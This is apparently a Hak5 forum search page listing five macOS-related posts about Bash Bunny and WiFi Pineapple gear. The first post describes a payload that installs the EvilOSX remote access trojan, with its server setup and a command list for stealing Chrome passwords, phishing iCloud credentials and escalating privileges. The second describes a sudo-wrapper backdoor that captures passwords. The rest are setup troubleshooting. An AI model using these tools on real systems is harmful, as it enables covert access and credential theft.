Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'macos'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 5 results

  1. [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "10.99.99.16" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server [email protected]:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  2. [PAYLOAD]SudoBackdoor

    Ding ding, it's payload time This is a two stages payload. First you use the 'injector' that will install a small bash script which is a wrapper for sudo. The script will store the passwords. Second, you use the 'cleaner' to get the passwords back and clean the backdoor. So basically, you get access to a computer running MacOS or Linux (you can config the payload by setting mac=true) and you install the backdoor. A couple of hours/days/weeks later you comme back, grab the passwords and erase traces. Easy Link: https://github.com/oXis/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor I'll submit a pull request but first I need people to test this on MacOS and Linux. It works on my Linux Mint. Ninja!
  3. Initial setup problems

    I'm having some problems getting started with the Bash Bunny and after watching some YT videos, reading the Wiki and forums, I figured I'd start a new thread to see if some of you could set me straight. I'm using macOS 10.12.5. Specifically, I am having no luck getting the Bunny to share my network connection. Here's what I've done so far: - I can serial into the Bunny by using the Serial app on macOS. Works just fine. I ran ifconfig while connected via serial and only see the local adapter. I can configure eth0 but the Bunny forgets it after it's removed. - The Bunny will show up in Serial as something that I can connect to. It also shows up in Finder. It does not show up under System Preferences --> Sharing so I cannot enable sharing there. There was a great forum post on this but I just couldn't get it to work. - I've booted the Bunny on setting one with a payload file (payload.txt) that only includes the following line: ATTACKMODE ECM_ETHERNET. I did not use #!/bin/bash or a specific LED pattern, just that one line. This seems to do nothing. I also tried "ATTACKMODE RNDIS_ETHERNET STORAGE" (no quotes) but this didn't do anything either. - I installed and ran Squid as specified in the Wiki. I can seemingly run Squid but ssh to 172.16.64.1 results in a time out on port tcp/22. - Since nothing has worked, I've also tried using bb.sh to try and set up the Bunny this way. When I do that, I am allowed to get to the confirmation of network info (basically do you want guided or manual and do you have iproute installed) but then the gateway and IP are set to blanks. When I set them, the script times out on step three (error on line 183) telling me to connect the Bunny to my computer. So I feel like I've tried a lot of things here and I'm not even getting close. Any advice anyone has for me is sincerely appreciated. I feel like this shouldn't be this hard! Thank you!
  4. ICS on macOS: There and back again Apple likes to hard code the subnet (192.168.2.1) that is used on its implementation of Internet Connection Sharing (ICS). I don't know why; best I can figure is that somehow allows them to more reliably prevent the client network to access any resources on the host network. This is something that can be prevented on other ICS setups with a firewall rule. Which brings me to another point. Apple likes to change firewalls. Apple likes to change everything. They recently switched to PF and a lot of the guides online are from before this change. So we've established something here. Apple changes things. And we can't stop them from changing things. So what do we do? Accounting for Change One thing has remained consistent in their various iterations of ICS. They use the subnet 192.186.2.0/24. This gives us 1 constant, and if we've learned our lesson, we also know that it may not stay constant. So let me backup. *ahem* We have zero constants. But we can plan for this one constant changing. Apple needs this base principle (a subnet) on which to build its ICS implementation. Think of a single stream in the woods that recursively branches out into thousands. In order to catalog the various species in the stream, it would not be wise to visit and collect samples from every stream. This would be inefficient. It would better serve you, your time and your study to head to the one stream whence all others came. The source. This subnet is the one stream and any changes Apple makes will use it. And even if it changes it, it's still only one change we have to account for. Knowing this, we can start to look at this problem from another perspective. We can stop visiting individual streams and concede that our network must in the 192.168.2.1/24 range. What does that mean for Pineapple users? It means you can't access the Pineapple on 172.16.42.1 anymore. Is this a bad thing? Meh. It's a thing. For sure. I'd posit it's even a good thing. If we leave our pineapples on the default network, we eliminate the guesswork needed for anyone hunting pineapple. Yes, those people exists. And the tools necessary to do so bank on the fact that you haven't changed your default settings. See here. Is there a simple solution? Just move the pineapple to a different network! How? Depending on the version of the Pineapple, you can use WiFi or Ethernet or Etherner-over-USB to make the initial connection to the Pineapple over SSH on 172.16.42.1. Once you're in: # This one could be anything you want. It's what you'll use to connect after the reboot uci set network.lan.ipaddr='192.168.2.10' # This is where the Pineapple will get it's Internet from. uci set network.lan.gateway='192.168.2.1' uci commit && reboot That's it. Once you've rebooted, you can access the web interface and SSH like you would at 172.16.42.1, but if you used my configuration settings from above, you can access it from 192.168.2.10. What if Apple changes the subnet? Then you only have two values to change. Be sure to actually turn on ICS from the Mac's System Preferences > Sharing Pane.
  5. Bunny not recognised & buggy

    Hi, I just received my Bash Bunny a few days ago and I've been tinkering around with it. It seems, to me, to be quite buggy: - Windows does not recognise the RNDIS interface at all. Not on Windows 7, not on Windows 10. - On MacOS, the ethernet interface *sometimes* works, sometimes it doesn't. When it does work, *sometimes* it is possible to connect to the Bunny using, quite often, SSH doesn't start up even though FTP and other services are running. This even after a few minutes waiting. - The serial interface often conflicts with having network & storage together, resulting in nothing happening or giving only access to storage. (I did this by adding "SERIAL" to the standard payloads already on the Bunny) - Using the manuals found online for network sharing (MacOS Internet sharing through 172.16.64.64), I cannot access the internet from the Bunny, so I cannot update it. On Windows, that's entirely out of the question as Windows does not even recognise the RNDIS network device. Windows gives the following message on the RNDIS driver: The drivers for this device are not installed. (Code 28) There are no compatible drivers for this device. To find a driver for this device, click Update Driver.
×